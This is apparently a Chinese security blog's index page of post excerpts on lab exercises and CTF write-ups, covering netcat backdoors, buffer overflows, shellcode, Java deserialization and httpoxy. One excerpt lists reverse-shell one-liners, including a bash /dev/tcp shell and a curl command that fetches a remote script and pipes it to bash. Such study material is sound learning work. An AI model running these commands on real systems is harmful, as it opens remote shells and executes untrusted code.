摘要:
实验内容 使用netcat获取主机操作Shell,cron启动 netcat是一个底层工具,进行基本的TCP UDP数据收发。常被与其他工具结合使用,起到后门的作用。 其中 选项可以指定一个文件在连接后打开 Windows主机获取Kali shell kali在终端输入 ,将shell反弹给wind 阅读全文
摘要:
x64与x86的区别 64位系统中,不再使用 来进行系统调用,取而代之的是 指令 x64的栈不支持push64位的立即数,必须先把常量放到寄存器里再push x64的CPU的地址为64位,但实际上只支持48位的虚拟地址空间供软件使用。虚拟地址的高16位在用户模式下总是被设置为 ,而在内核模式下全置为 阅读全文
摘要:
题目复现链接: "https://buuoj.cn/challenges" 参考链接: "2020 年 V&N 内部考核赛 WriteUp" "从一道题入门JAVA反序列化漏洞" "V&N公开赛2020 writeup" Java反序列化 "深入了解序列化writeObject、readObject 阅读全文
摘要:
实践内容 手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。 利用foo函数的Bof漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。 注入一个自己制作的shellcode并运行这段shellcode 实践过程 直接修改程序机器指令,改变程序执行流程 知识要求 阅读全文
摘要:
题目复现链接: "https://buuoj.cn/challenges" 参考链接: "2020 年 V&N 内部考核赛 WriteUp" "V&N公开赛2020 writeup" httpoxy "https://httpoxy.org/" "HTTPOXY漏洞说明" 利用条件: 代码以cgi模 阅读全文
摘要:
题目复现链接: "https://buuoj.cn/challenges" 参考链接: "2020 年 V&N 内部考核赛 WriteUp" "V&N公开赛2020 writeup" 反弹shell 在用bash反弹失败后就放弃了。。。惭愧。作为弥补,收集一下反弹shell脚本 "反弹shell" 阅读全文
摘要:
收集一点可能用上的反弹shell命令 bash bash -i >& /dev/tcp/ip/port 0>&1 curl bash -i >& /dev/tcp/192.168.20.151/7777 0>&1 curl http://174.1.73.154/shell.txt|bash PS: 阅读全文
摘要:
题目复现链接: "https://buuoj.cn/challenges" 参考链接: "PASECACTF 2019 Honey_shop" `/proc/self/`永远指向当前进程,而本题源码中 将`SECRET_KEY /proc/self/environ`获取,environ文件记录着当前 阅读全文
摘要:
题目复现链接: "https://buuoj.cn/challenges" 参考链接: "[hitcon2017] Baby^H master php 2017 复现" 匿名函数函数名 匿名函数其实是有真正的名字,为 (%d格式化为当前进程的第n个匿名函数) Apache prefork模型(默认模 阅读全文
摘要:
题目复现链接: "https://buuoj.cn/challenges" 参考链接: "xctf web i got id 200" perl 任意文件读取 题目使用如上代码将上传的文件原样输出到网页 param()函数会返回一个列表的文件但是只有第一个文件会被放入到下面的file变量中。而对于下 阅读全文